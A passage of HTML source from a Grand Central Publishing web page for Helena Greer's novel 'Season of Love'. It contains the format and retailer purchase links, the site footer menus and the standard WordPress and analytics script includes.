	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/helena-greer/season-of-love/9781538706541/">
						ebook					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/helena-greer/season-of-love/9781668612125/">
						Audiobook Download <span class="title-header__dropdown-format">Unabridged</span>					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1869575828  desc-arrow-1049210643">
	<title id="titlet-arrow-1869575828">Arrow Icon</title>
	<desc id="desc-arrow-1049210643">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/1538706539?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781538706534"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781538706534"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9781538706534"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9781538706534"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9781538706534/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9781538706534"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9781538706534"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9781538706534"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>

				</div>
		</div>

			<!-- Add sidebar if sidebar content -->
				</article>
</main>

<div class="hbg-after-main-content">
	</div>
				
<footer class="site-footer">
	<div class="site-footer__logo">
		
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 59.72 59.73" role="img" aria-labelledby="title-hachette-logo-ini-2446012959  desc-hachette-logo-ini-808553285">
<title id="title-hachette-logo-ini-2446012959">Hachette Logo</title>
<desc id="desc-hachette-logo-ini-808553285">Large H Initial</desc>
<polygon role="presentation" class="initial-logo-cls-1" points="59.72 59.73 59.72 0 36.93 0 36.93 4.33 55.4 4.33 55.4 55.4 41.26 55.4 41.26 36.93 18.46 36.93 18.46 41.26 36.93 41.26 36.93 59.73 59.72 59.73"/>
<polygon role="presentation" class="initial-logo-cls-1" points="22.79 18.47 41.26 18.47 41.26 22.79 18.47 22.79 18.47 4.33 4.33 4.33 4.33 55.4 22.79 55.4 22.79 59.73 0 59.73 0 0 22.79 0 22.79 18.47"/></svg>
	</div>
			<ul class="site-footer__social">
							<li class="site-footer__social-list-item">
					<a href="https://www.facebook.com/GrandCentralPub" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Facebook"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-facebook-icon-3459423454  desc-facebook-icon-1303551531">
	<title id="title-facebook-icon-3459423454">Facebook Icon</title>
	<desc id="desc-facebook-icon-1303551531">Round FB icon with f initial</desc>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm4.47,19.37H21.06V30.44H16.23c0-3.41,0-7.4,0-11H14.18V15.93h2c.1-2.55.14-5.07,1.41-6.36C19,8.12,20.4,8.3,24.55,8.3v3.56s-2.63-.26-3.29.75c-.36.55-.15,2.16-.18,3.32h3.49C24.27,17.28,24.06,18.2,23.84,19.37Z" transform="translate(0 0.01)"/></svg>
					</a>
				</li>
										<li class="site-footer__social-list-item">
					<a href="https://twitter.com/GrandCentralPub" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Twitter"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-twitter-icon-1846520073  desc-twitter-icon-3703845168">
	<title id="title-twitter-icon-1846520073">Twitter Icon</title>
	<desc id="desc-twitter-icon-3703845168">Twitter Logo</desc>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.32,13.62a6.18,6.18,0,0,1-1.3,1.49l-.6.47A11,11,0,0,1,26.62,18a10.69,10.69,0,0,1-7.49,8.45,11.45,11.45,0,0,1-5.41.22A13.94,13.94,0,0,1,11.47,26a9,9,0,0,1-1.08-.56l-.34-.2a6.24,6.24,0,0,0,1.22,0c.38-.06.74,0,1.09-.12a7.83,7.83,0,0,0,2.29-.83,4.25,4.25,0,0,0,1-.68,3.25,3.25,0,0,1-1.14-.2A3.84,3.84,0,0,1,12.14,21c.37,0,1.45.14,1.71-.07a2.79,2.79,0,0,1-1.25-.5,3.68,3.68,0,0,1-1.8-3.27l.39.19a4.2,4.2,0,0,0,.8.22,1.15,1.15,0,0,0,.52,0h0c-.19-.22-.51-.37-.7-.61a3.91,3.91,0,0,1-.86-3.47,4.43,4.43,0,0,1,.41-1h0a2.33,2.33,0,0,0,.35.4A7,7,0,0,0,12.85,14a11.25,11.25,0,0,0,4.67,2.26,7.31,7.31,0,0,0,1.72.22,3.55,3.55,0,0,1,0-1.79,3.77,3.77,0,0,1,2.16-2.57,4.64,4.64,0,0,1,.85-.26l.47-.06a3.93,3.93,0,0,1,3,1.2,6.2,6.2,0,0,0,2-.66l.48-.26a3.82,3.82,0,0,1-1.24,1.79,1.82,1.82,0,0,1-.42.3h0a7.15,7.15,0,0,0,2.16-.59Z" transform="translate(0 0)"/></svg>
					</a>
				</li>
										<li class="site-footer__social-list-item">
					<a href="https://www.instagram.com/grandcentralpub/" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Instagram"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-ig-icon-1622452226  desc-ig-icon-3732446179">
	<title id="title-ig-icon-1622452226">Instagram Icon</title>
	<desc id="desc-ig-icon-3732446179">Instagram Icon</desc>
	<rect role="presentation" class="cls-1" x="23.01" y="11.86" width="3.88" height="3.88" rx="0.97" ry="0.97"/>
	<path role="presentation" class="cls-1" d="M25.31,19.37a5.94,5.94,0,1,1-11.66-1.58H11.86v8.12a1,1,0,0,0,1,1H25.92a1,1,0,0,0,1-1V17.79H25.1A5.94,5.94,0,0,1,25.31,19.37Z" transform="translate(0 0)"/>
	<path role="presentation" class="cls-1" d="M19.37,23.13a3.76,3.76,0,0,0,3.76-3.76,3.9,3.9,0,0,0,0-.4l0-.11c0-.09,0-.19,0-.28l0-.12c0-.09,0-.17-.07-.26l0-.12-.1-.24,0,0h0a3.75,3.75,0,0,0-6.81,0h0l0,0-.1.24,0,.12c0,.08-.05.17-.07.26l0,.12c0,.09,0,.18,0,.28s0,.07,0,.11a3.83,3.83,0,0,0,0,.4A3.76,3.76,0,0,0,19.37,23.13Z" transform="translate(0 0)"/>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.69,26.64a2.42,2.42,0,0,1-2.42,2.42H12.1a2.42,2.42,0,0,1-2.42-2.42V12.1A2.42,2.42,0,0,1,12.1,9.68H26.64a2.42,2.42,0,0,1,2.42,2.42Z" transform="translate(0 0)"/>
</svg>
					</a>
				</li>
										<li class="site-footer__social-list-item">
					<a href="http://grandcentralpub.tumblr.com/" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Tumblr"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 60 60" role="img" aria-labelledby="title-tumblr-icon-508007845  desc-tumblr-icon-1128795482">
	<title id="title-tumblr-icon-508007845">Tumbler Icon</title>
	<desc id="desc-tumblr-icon-1128795482">Tumbler Icon</desc>
	<path class="cls-1" d="M30,60A30,30,0,1,0,0,30,30,30,0,0,0,30,60Zm0-47v9H38.1v5.77H30v8.14a14.12,14.12,0,0,0,.31,3.83A2.61,2.61,0,0,0,31.5,41a4.9,4.9,0,0,0,2.59.68A9.27,9.27,0,0,0,39.23,40v5.41c-.25.12-.81,1.87-6.63,1.87-9.44,0-9.44-6.65-9.44-8.22V27.69H18.5v-5.6a8.6,8.6,0,0,0,3.17-1.8A9.39,9.39,0,0,0,24,17.34a15.15,15.15,0,0,0,1.19-4.64H30Z" transform="translate(0 0.01)"/></svg>
					</a>
				</li>
										<li class="site-footer__social-list-item">
					<a href="https://www.youtube.com/channel/UCvUxnjFAd57CcM25e95K6Qg" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="YouTube"
					>
						
<svg data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 49 48.9" role="img" aria-labelledby="title-search-icon-510398505  desc-search-icon-3622295071"><defs>
<style>.youtube-youtube-cls-1{fill:#fff;}</style></defs>
<title id="title-search-icon-510398505">Youtube Icon</title>
<desc id="desc-search-icon-3622295071">YouTube Logo</desc>
<polygon role="presentation" class="youtube-cls-1" points="21.9 20.45 21.9 27.75 28.7 24.15 25 22.15 21.9 20.45"/>
<path role="presentation" class="youtube-cls-1" d="M25,.55A24.45,24.45,0,1,0,49.5,25,24.45,24.45,0,0,0,25,.55ZM37.5,26a29.54,29.54,0,0,1-.2,4.2,6.4,6.4,0,0,1-1,2.6,3.58,3.58,0,0,1-2.5,1.1c-3.5.3-8.7.3-8.7.3s-6.5-.1-8.5-.3a3.93,3.93,0,0,1-2.8-1.1,6.4,6.4,0,0,1-1-2.6,29.66,29.66,0,0,1-.3-4.2V24c.1-1.4.1-2.8.3-4.2a6.4,6.4,0,0,1,1-2.6,3.25,3.25,0,0,1,2.5-1.1c3.5-.3,8.7-.3,8.7-.3s5.2,0,8.7.3a3.41,3.41,0,0,1,2.5,1.1,6.4,6.4,0,0,1,1,2.6,20.49,20.49,0,0,1,.3,4.2Z" transform="translate(-0.5 -0.55)"/></svg>
					</a>
				</li>
													<li class="site-footer__social-list-item">
					<a href="http://www.pinterest.com/grandcentralpub" target="_blank"
						data-type="link-event" data-category="Social Share" data-action="Header" data-label="Pinterest"
					>
						<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 60 60" role="img" aria-labelledby="title-pinterest-icon-2171500841  desc-pinterest-icon-345054256">
	<title id="title-pinterest-icon-2171500841">Pinterest Icon</title>
	<desc id="desc-pinterest-icon-345054256">Pinterest icon</desc>
	<path class="cls-1" d="M56,14.94A29.87,29.87,0,0,0,45.06,4,29.35,29.35,0,0,0,30,0,29.35,29.35,0,0,0,14.94,4,29.87,29.87,0,0,0,4,14.94,29.35,29.35,0,0,0,0,30,29.08,29.08,0,0,0,5,46.52a29.9,29.9,0,0,0,13,11,25.87,25.87,0,0,1,.51-6.91l3.87-16.33a10.42,10.42,0,0,1-1-4.77A9,9,0,0,1,23,23.95a5,5,0,0,1,4.1-2.23,3.66,3.66,0,0,1,3,1.29,5,5,0,0,1,1.05,3.24,12.13,12.13,0,0,1-.45,2.95q-.45,1.74-1.17,4t-1,3.65a4.43,4.43,0,0,0,.9,4.08,4.78,4.78,0,0,0,3.83,1.7q4.18,0,6.86-4.65a22.29,22.29,0,0,0,2.68-11.29,11.08,11.08,0,0,0-3.3-8.32q-3.3-3.2-9.2-3.2A14.22,14.22,0,0,0,15.55,29.57a8.89,8.89,0,0,0,2,5.9A1.78,1.78,0,0,1,18,37.15q-.08.23-.31,1.17t-.31,1.21q-.31,1.25-1.48.78A8.82,8.82,0,0,1,11.29,36a15.62,15.62,0,0,1-1.56-7.15,17,17,0,0,1,.84-5.23,17.86,17.86,0,0,1,2.62-5.06,20.57,20.57,0,0,1,4.26-4.32,20,20,0,0,1,6-3,25.08,25.08,0,0,1,7.66-1.13,20.1,20.1,0,0,1,10,2.46,17.58,17.58,0,0,1,6.74,6.37,16.07,16.07,0,0,1,2.32,8.36,26.27,26.27,0,0,1-2,10.55,17.32,17.32,0,0,1-5.74,7.36,14.07,14.07,0,0,1-8.44,2.68,9.26,9.26,0,0,1-4.45-1.11,6.51,6.51,0,0,1-2.85-2.64Q24.88,51,24.53,52.34a24,24,0,0,1-3,6.41A30,30,0,0,0,45.06,56,29.87,29.87,0,0,0,56,45.06,29.35,29.35,0,0,0,60,30,29.35,29.35,0,0,0,56,14.94Z" transform="translate(0 0)"/></svg>
					</a>
				</li>
								</ul>
		<nav class="site-footer__menus">
		
<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-about" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-about">
			About			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-about">
			<ul id="menu-about" class="menu"><li id="menu-item-647353" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-647353"><a href="/landing-page/about-hachette-book-group-2/">About Us</a></li>
<li id="menu-item-478324" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478324"><a href="https://www.grandcentralpublishing.com/leadership/">Our Leadership</a></li>
<li id="menu-item-478335" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478335"><a href="https://www.hachettebookgroup.com/imprints/">Imprints</a></li>
<li id="menu-item-550778" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-550778"><a href="https://www.hachettebookgroup.com/newsletters/">Newsletter Subscription</a></li>
<li id="menu-item-1192194" class="menu-item menu-item-type-post_type menu-item-object-landing-page menu-item-1192194"><a href="https://www.hachettebookgroup.com/landing-page/freedom-of-expression/">Freedom of Expression</a></li>
<li id="menu-item-1204864" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1204864"><a href="/landing-page/social-impact-at-hbg/">Social Impact at HBG</a></li>
<li id="menu-item-478329" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478329"><a href="https://www.hachettebookgroup.com/about/hbg-in-the-news/">HBG In the News</a></li>
<li id="menu-item-478328" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478328"><a href="https://www.hachettebookgroup.com/press-publicity/">Press &amp; Publicity</a></li>
</ul>		</div>
	</li>
</ul>

<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-resources" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-resources">
			Resources			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-resources">
			<ul id="menu-resources" class="menu"><li id="menu-item-230735" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230735"><a target="_blank" rel="noopener" href="https://authorportal.hbgusa.com">Authors &#038; Agents</a></li>
<li id="menu-item-230733" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230733"><a target="_blank" rel="noopener" href="https://www.hachettebookgroup.com/landing-page/hbg-booksellers/">Booksellers</a></li>
<li id="menu-item-230734" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230734"><a target="_blank" rel="noopener" href="https://www.hachettebookgroup.com/landing-page/client-services/">Client Services</a></li>
<li id="menu-item-230736" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230736"><a target="_blank" rel="noopener" href="https://www.hbgresources.com/">Librarians &#038; Educators</a></li>
<li id="menu-item-665775" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-665775"><a href="https://www.hachettebookgroup.com/landing-page/ordersupport">eCommerce Order Support</a></li>
<li id="menu-item-913357" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-913357"><a href="https://www.hachetteacademic.com/">Hachette Academic</a></li>
<li id="menu-item-512066" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-512066"><a href="https://www.grandcentralpublishing.com/about/careers/">Careers</a></li>
<li id="menu-item-478333" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-478333"><a href="https://www.hachettebookgroup.com/landing-page/contact-us-2">Contact HBG</a></li>
<li id="menu-item-478352" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478352"><a href="https://www.hachettebookgroup.com/about/faqs/">FAQ</a></li>
</ul>		</div>
	</li>
</ul>

<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-terms-and-policies" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-terms-and-policies">
			Terms and Policies			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-terms-and-policies">
			<ul id="menu-terms-and-policies" class="menu"><li id="menu-item-230741" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230741"><a href="https://www.hachettebookgroup.com/terms-and-policies/terms-of-use/">Terms of Use</a></li>
<li id="menu-item-230740" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-230740"><a href="https://www.hachettebookgroup.com/terms-and-policies/privacy-policy/">Privacy Policy</a></li>
<li id="menu-item-927110" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-927110"><a target="_blank" rel="noopener" href="https://hbgusa.zendesk.com/hc/en-us/articles/360047685472-HBG-CCPA-Privacy-Rights-Tool">Do Not Sell My Personal Information</a></li>
<li id="menu-item-362560" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-362560"><a href="https://www.hachettebookgroup.com/terms-and-policies/report-piracy/">Report Piracy</a></li>
<li id="menu-item-230738" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230738"><a href="https://www.grandcentralpublishing.com/terms-and-policies/cpsia/">CPSIA</a></li>
</ul>		</div>
	</li>
</ul>
	</nav>
	<div class="site-footer__copyright">
		© 2022 Hachette Book Group		<br>
		Portions of data on HachetteBookGroup.com are supplied by Books In Print &reg;. Copyright 2022 ProQuest LLC. All rights reserved. All rights in images of books or other publications are reserved by the original copyright owners.	</div>
</footer>
			</div><!-- #content -->
		</div><!-- #page -->
		<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-content/mu-plugins/jetpack-11.4/_inc/build/photon/photon.min.js?ver=20191001' id='jetpack-photon-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-content/plugins/hachette-plugin/build/campaignViewFrontEnd.bundle.min.js?ver=924ebac2a74733c46a71' id='hachette-plugin-campaign-view-frontend-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.1' id='jquery-ui-core-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/jquery/ui/menu.min.js?ver=1.13.1' id='jquery-ui-menu-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9' id='regenerator-runtime-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0' id='wp-polyfill-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/dist/dom-ready.min.js?ver=d996b53411d1533a84951212ab6ac4ff' id='wp-dom-ready-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/dist/hooks.min.js?ver=c6d64f2cb8f5c6bb49caca37f8828ce3' id='wp-hooks-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/dist/i18n.min.js?ver=ebee46757c6a411e38fd079a7ac71d94' id='wp-i18n-js'></script>
<script type='text/javascript' id='wp-i18n-js-after'>
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
</script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/dist/a11y.min.js?ver=a38319d7ba46c6e60f7f9d4c371222c5' id='wp-a11y-js'></script>
<script type='text/javascript' id='jquery-ui-autocomplete-js-extra'>
/* <![CDATA[ */
var uiAutocompleteL10n = {"noResults":"No results found.","oneResult":"1 result found. Use up and down arrow keys to navigate.","manyResults":"%d results found. Use up and down arrow keys to navigate.","itemSelected":"Item selected."};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.13.1' id='jquery-ui-autocomplete-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-content/themes/hachette/static/js/common.bundle.min.js?ver=8fec604ac362970199bc' id='hachette-common-js-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2' id='hoverIntent-js'></script>
<script type='text/javascript' id='hachette-site-js-js-extra'>
/* <![CDATA[ */
var newsletter = {"ajax_url":"https:\/\/www.grandcentralpublishing.com\/wp-admin\/admin-ajax.php","nonce":"9c828f3e12","duplicate":"Success! You're signed up.","success":"Success! You're signed up.","invalid":"Hm, try another email?","error":"We're sorry, there was an error."};
var mailchimpPopup = {"ajax_url":"https:\/\/www.grandcentralpublishing.com\/wp-admin\/admin-ajax.php","nonce":"bdd88b716b","success":"Your preferences have been successfully saved.","error":"We're sorry, there was an error."};
var whatsInside = {"ajaxUrl":"\/wp-admin\/admin-ajax.php?action=zola_preview&zola-auth=b79dc2e0ac"};
var lazyTitles = {"ajaxUrl":"\/wp-admin\/admin-ajax.php?action=lazy_title&load-title-auth=fd9d126dc6"};
var icons = {"contributor":"https:\/\/www.grandcentralpublishing.com\/wp-content\/themes\/hachette\/static\/images\/icons\/contributor.png","hbg-title":"https:\/\/www.grandcentralpublishing.com\/wp-content\/themes\/hachette\/static\/images\/icons\/hbg-title.png"};
var geoCountryCode = "US";
var euroUser = "false";
var gdprForAll = "false";
var analytics = {"environAuth":"EVafa-1EU0ArWEPW1vxdeQ","environPreview":"env-24","dataLayer":"dataLayer","containerKey":"GTM-5LRFFXK"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-content/themes/hachette/static/js/hachette-site.bundle.min.js?ver=8fec604ac362970199bc' id='hachette-site-js-js'></script>
<script type='text/javascript' id='hbg-all-domains-js-js-extra'>
/* <![CDATA[ */
var checkExam = {"ajaxUrl":"https:\/\/www.grandcentralpublishing.com\/wp-admin\/admin-ajax.php","nonce":"968ed0fb29","isbns":["2022 Holiday Gift Guide: Fiction"],"button":".zb-btn","link":"exam-copy-link","zola_url":"https:\/\/examcopyrequestform.poweredbyzola.com\/?isbn="};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-content/themes/hachette-book-group/client/build/js/lens-hbg-all-domains.bundle.js?ver=58e1dc109658eac8e662' id='hbg-all-domains-js-js'></script>
<script type='text/javascript' id='vue_cart-js-extra'>
/* <![CDATA[ */
var source = {"env":"production","cartMessage":""};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-content/themes/hachette-book-group/client/build/images/static/js/cart.js?ver=0.1' id='vue_cart-js'></script>
<script type='text/javascript' src='https://platform.twitter.com/widgets.js?ver=1.0' id='hbg-twitter-widget-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-content/themes/hachette-book-group/client/build/js/lens-grand-central-publishing.bundle.js?ver=58e1dc109658eac8e662' id='hachette-lens-js-js'></script>
<script src='https://stats.wp.com/e-202244.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:11.4',blog:'155679224',post:'1273837',tz:'-4',srv:'www.grandcentralpublishing.com',hp:'vip'} ]);
	_stq.push([ 'clickTrackerInit', '155679224', '1273837' ]);
</script>
	</body>
</html>

